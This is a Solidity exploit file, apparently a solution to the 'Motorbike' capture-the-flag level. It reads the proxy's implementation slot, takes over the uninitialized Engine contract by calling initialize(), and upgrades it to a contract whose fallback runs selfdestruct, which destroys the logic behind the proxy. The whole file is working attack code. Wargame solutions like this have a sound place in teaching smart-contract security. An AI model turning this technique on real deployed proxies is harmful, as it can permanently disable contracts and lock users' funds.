MotorbikeExploit.sol

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

import "./Motorbike.sol";
import "forge-std/Vm.sol";

function playerScript(address instanceAddress, Vm vm) {
    bytes32 IMPLEMENTATION_SLOT = 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc;
    address engineAddress = address(uint160(uint256(vm.load(instanceAddress, IMPLEMENTATION_SLOT))));
    MotorbikeExploit exploit = new MotorbikeExploit();
    exploit.exploit(instanceAddress, engineAddress);
}

contract MotorbikeExploit {
    function exploit(address, address engineAddress) public {
        Engine engine = Engine(engineAddress);
        EngineDestruct engineDestruct = new EngineDestruct();
        engine.initialize();
        engine.upgradeToAndCall(address(engineDestruct), "0");
    }
}

contract EngineDestruct {
    fallback() external {
        selfdestruct(payable(tx.origin));
    }
}